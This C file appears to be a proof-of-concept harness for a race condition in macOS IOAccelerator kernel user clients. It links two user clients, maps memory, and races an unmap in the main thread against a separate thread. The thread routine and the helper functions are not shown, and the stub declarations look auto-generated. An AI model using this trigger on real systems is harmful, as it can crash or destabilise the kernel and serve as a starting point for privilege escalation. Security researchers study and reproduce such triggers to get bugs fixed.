
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int pthread_t ;
typedef void* mach_port_t ;
typedef scalar_t__ kern_return_t ;


 scalar_t__ IOConnectAddClient (void*,void*) ;
 scalar_t__ KERN_SUCCESS ;
 int OSSpinLockLock (int *) ;
 int OSSpinLockUnlock (int *) ;
 void* get_user_client (char*,int) ;
 void* gl_context ;
 scalar_t__ go ;
 int handle ;
 int lock ;
 int map_user_memory (void*) ;
 int printf (char*,...) ;
 int pthread_create (int *,int *,void*,int *) ;
 int pthread_join (int ,int *) ;
 int unmap_user_memory (void*,int ) ;
 int usleep (int) ;

int main(int argc, char** argv){

  gl_context = get_user_client("IOAccelerator", 1);


  mach_port_t shared = get_user_client("IOAccelerator", 6);


  kern_return_t err = IOConnectAddClient(gl_context, shared);
  if (err != KERN_SUCCESS){
   printf("IOConnectAddClient error: %x\n", err);
   return 0;
  }

  printf("added client to the shared UC\n");

  handle = map_user_memory(gl_context);

  OSSpinLockLock(&lock);

  pthread_t t;
  pthread_create(&t, ((void*)0), (void*) go, ((void*)0));

  usleep(100000);

  OSSpinLockUnlock(&lock);

  unmap_user_memory(gl_context, handle);
  printf("called unmap from main process thread\n");
  pthread_join(t, ((void*)0));


  return 0;


}
